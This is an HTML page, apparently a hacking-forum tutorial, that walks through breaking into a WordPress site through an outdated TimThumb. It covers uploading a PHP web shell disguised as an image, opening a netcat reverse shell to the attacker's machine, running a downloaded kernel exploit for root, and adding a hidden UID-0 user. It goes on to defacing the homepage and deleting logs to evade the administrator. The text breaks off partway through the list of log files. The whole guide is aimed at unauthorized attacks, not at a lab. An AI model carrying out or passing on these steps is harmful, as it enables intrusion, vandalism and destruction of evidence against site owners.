<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-Boot to Backtrack</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-Connect to your VPN or to Tor.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-It would be good to read a complete guide to stay anonymous while hacking <a href="http://www.hackforums.net/showthread.php?tid=2145893" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" title="Hackforums.net">here…</a></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-Open Firefox.</span></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">1. Finding a Vulnerable Website and Information about it:</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Crack Acunetix (find tutorial at Hackforums.net). Open and scan the website (use the standard profile – don’t modify anything except if you know what you are doing). For this tutorial our website will be:<strong><a href="http://www.site.com/" rel="nofollow" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">http://www.site.com</a></strong> <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(not very innovative, I know….)</em></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Let’s say we find a vulnerability where we can upload a remote file (our shell) and have access to the website’s files.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">OK. Now, we have the site and the path that the vulnerability is. In our example let’s say it is here:</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.site.com/blog/wp-content/themes/theme_name/thumb.php" rel="nofollow" style="background-color: white; border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">http://www.site.com/blog/wp-content/themes/theme_name/thumb.php</a></em></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">The above vulnerability affects WordPress blogs that have installed certain plugins or themes and haven’t updated to the latest version of TimThumb, which is a image-editing service on websites.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">OK. Acunetix should also mention the OS of the Server. Assuming that ours is a Unix/Linux system <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(so as to show you how to root it)</em>.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">For now, we don’t need anything more from Acunetix.</span></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">2. Uploading the shell:</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><strong>Till now, we know:</strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-The website’s blog has a huge vulnerability at <strong>TimThumb</strong>.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">-It is hosted on a <strong>Unix</strong> System.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Next, because of the fact that the Vulnerability is located at an outdated TimThumb version, and timthumb is a service to edit images, we need to upload the shell instead of the image.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Thus, download any image (I would recommend a small one) from Google Images. We don’t care what it shows.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><strong>Generate Output with iCon2PHP</strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Copy your Image and your Shell to the Folder that iCon2PHP is located.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Run the Program and follow the in-program instructions to build the ‘finalImage.php’.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">To avoid any errors while uploading rename the ‘finalImage.php’ to ‘image.php;.png’ <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(instead of png, type the image format your image was – jpeg,jpg,gif….)</em> This is the exactly same file but <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">it confuses the uploader and thinks that it actually is an image.</span></span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">iCon2PHP Terminal Output:</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">[...]</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Enter the Path of your Image: image.png<br />Please enter the path to the PHP: GnYshell.php</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Entered!</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Valid Files!<br />[...]<br />File: ‘finalImage.php’ has been successfully created at the Current Directory…</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<strong><span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Upload Output to a Server:</span></strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Next, upload your ‘image.php;.png’ at a free server. <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(000webhost, 0fees etc….)</em></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Go to the vulnerability and type at the URL:</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><a href="http://www.site.com/blog/wp-content/themes/theme_name/thumb.php" rel="nofollow" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;">http://www.site.com/blog/wp-content/themes/theme_name/thumb.php</a><strong>?src=http://<span style="border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">flickr.com.</span>domain.0fees.net/image.php;.png</strong></em></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">It would be better to create a subdomain like “flickr.com” <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(or other big image-hosting service)</em> because sometimes it doesn’t accept images from other websites.</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; text-align: center; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><strong>Website…. Shelled!</strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><img alt="" class=" " src="http://d1.dipads.net/i/00025/rq9k3vq8go5k.png" style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" title="GnYShell" /></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">OK. Your website is shelled. This means that you should now have your shell uploaded and ready to root the server.<br />You could easily deface the website now but it would be better if you first rooted the server, so as to cover your tracks quickly.</span></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">3. Root the Server:</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Now that you have shelled your website we can start the proccess to root the server.</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">What is rooting when it comes for Server Hacking?<br />—> Rooting a server is the proccedure when the hacker acquires root priviliges at the whole server. If you don’t understand this yet, I reasure you that by the end of the section “Rooting a server” you will have understood exactly what it is…</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong><span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Let’s procceed to rooting….</span></strong></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Connect via netcat:</span><br />1. Open a port at your router. For this tutorial I will be using 402. (Search Google on how to port forward. It is easier than it seems….)<br />2. Open Terminal.<br />3. Type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">netcat</em></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">4. Now type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">-l -n -v -p 402</em></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">5.It should have an output like this:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">listening on [any] 402 port</em></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">6. Now, go to the Back-Connection function at the Shell.<br />7. Complete with the following:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Host:<em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">YouIPAddress</em> Port: <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">402 (or the port you forwarded….)</em></span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">8. Hit connect and… Voila! Connected to the server!</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Downloading and Executing the Kernel exploit:</span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">1. Now, if you type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">whoami</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">you will see that you are <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">not</span> root yet…<br />2. To do so we have to download a kernel exploit. The kernel version is mentioned at your shell. <strong>Find kernel exploits <a href="http://localroot.th3-0utl4ws.com/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; font-weight: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank" title="Linux and Mac Kernel Exploits">here….</a></strong><br />3. Download it to your HDD and then upload it to the server via the Shell. <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Unzip first, if zipped….</em><br />4. Now do the following exploit preparations:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– The most usual types of exploits:<br />+++ Perl (.pl extension)<br />+++ C (.c extension)</span></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<em style="background-color: white; border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(( If the program is in C you have first to compile it by typing: <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">gcc exploit.c -o exploit</span> ))</em></div>
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">– Change the permissions of the exploit:<br /><em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">chmod 777 exploit</span></em></span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">5. Execute the exploit. Type:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">./exploit</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">6. Root permissions acquired! Type this to ensure:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">id</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<strong style="background-color: white;">or</strong></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">whoami</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">7. Add a new root user:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">adduser -u 0 -o -g 0 -G 1,2,3,4,6,10 -M root1<br /><em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">where root1 is your desired username</em></span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">8. Change the password of the new root user:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">passwd root1</span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"><strong>SUCCESSFULLY ROOTED!</strong></span></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">4. Deface the Website:</span></h4>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;"><em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">What is defacing?</em><br />Defacing is the proccedure when the hacker uploads his own inbox webpage to <strong>alter the homepage</strong> of a site. In this way, he can <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">boost his reputation</span> or <span style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">parse a message</span> to the people or the company <em style="border: 0px; font-family: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">(which owns the website…).</em></span></div>
</blockquote>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Since you got the website shelled, you just create a nice hacky page in <a href="http://www.w3schools.org/" style="border: 0px; color: #b85b5a; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank">html</a> and upload it via the Shell as inbox.html (Delete or rename the website’s one…)</span></div>
<h4 style="border: 0px; font-family: impact; font-size: 2.4em; font-weight: inherit; line-height: 1em; margin: 0px; padding: 0px; vertical-align: baseline;">
<span style="background-color: white; border: 0px; font-family: inherit; font-size: 29px; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">5. Cover your tracks:</span></h4>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">Till now you were under the anonymity of Tor or ProXPN. You were very safe. However, in order to ensure that it will be impossible for the admin to locate you <strong>we have to delete logs.</strong></span></div>
<div style="border: 0px; color: #333333; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
<span style="background-color: white;">First of all, Unix based-Maschines have some logs that you have better to either edit or delete.<br />Common Linux log files name and their usage:</span></div>
<blockquote style="background-image: url(http://s1.wp.com/wp-content/themes/pub/greyzed/images/quote.gif); background-position: 0% 0%; background-repeat: no-repeat no-repeat; border: 0px; color: #747775; font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21.59375px; margin: 15px 30px 0px 10px; min-height: 32px; padding: 0px 0px 0px 60px; quotes: ''; vertical-align: baseline;">
<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 1.8em; padding: 0px; vertical-align: baseline;">
